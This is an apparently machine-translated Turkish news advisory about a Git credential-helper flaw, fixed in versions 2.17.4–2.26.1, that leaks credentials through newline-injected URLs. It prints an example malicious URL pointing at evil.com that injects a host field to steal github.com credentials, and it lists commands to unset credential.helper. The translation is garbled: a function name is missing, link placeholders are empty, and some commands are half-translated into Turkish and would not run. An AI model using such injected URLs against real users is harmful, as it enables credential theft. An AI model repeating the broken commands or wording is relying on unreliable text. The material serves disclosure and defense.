dağıtılmış kaynak kontrol sistemi Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ve 2.17.4'ün düzeltici sürümleri hangisi ortadan kaldırıldı () işleyicide "", bu, bir git istemcisi yeni satır karakteri içeren özel olarak biçimlendirilmiş bir URL kullanarak bir depoya eriştiğinde kimlik bilgilerinin yanlış ana bilgisayara gönderilmesine neden olur. Güvenlik açığı, başka bir ana bilgisayardaki kimlik bilgilerinin saldırgan tarafından kontrol edilen bir sunucuya gönderilmesini düzenlemek için kullanılabilir.
"https://evil.com?%0ahost=github.com/" gibi bir URL belirtirken, evil.com ana bilgisayarına bağlanırken kimlik bilgisi işleyicisi, github.com için belirtilen kimlik doğrulama parametrelerini iletecektir. Sorun, alt modüller için URL'lerin işlenmesi de dahil olmak üzere "git clone" gibi işlemler gerçekleştirilirken ortaya çıkar (örneğin, "git submodule update", depodaki .gitmodules dosyasında belirtilen URL'leri otomatik olarak işleyecektir). Güvenlik açığı, geliştiricinin URL'yi görmeden bir depoyu klonladığı durumlarda (örneğin, alt modüllerle çalışırken veya örneğin paket oluşturma komut dosyalarında otomatik eylemler gerçekleştiren sistemlerde) en tehlikelidir.
Yeni sürümlerdeki güvenlik açıklarını engellemek için kimlik bilgisi alışverişi protokolü aracılığıyla iletilen herhangi bir değerde yeni satır karakterinin geçirilmesi. Dağıtımlar için paket güncellemelerinin yayınlandığını sayfalardan takip edebilirsiniz. , , , , , , .
Sorunu engellemek için geçici bir çözüm olarak Genel depolara erişirken credential.helper'ı kullanmayın ve işaretlenmemiş depolarla "--recurse-submodules" modunda "git clone" kullanmayın. credential.helper işleyicisini tamamen devre dışı bırakmak için ve şifreleri alma , korumalı veya şifreli bir dosya için şu komutları kullanabilirsiniz:
git yapılandırma --unset credential.helper
git config --global --unset credential.helper
git yapılandırma --sistem --unset credential.helper
Kaynak: opennet.ru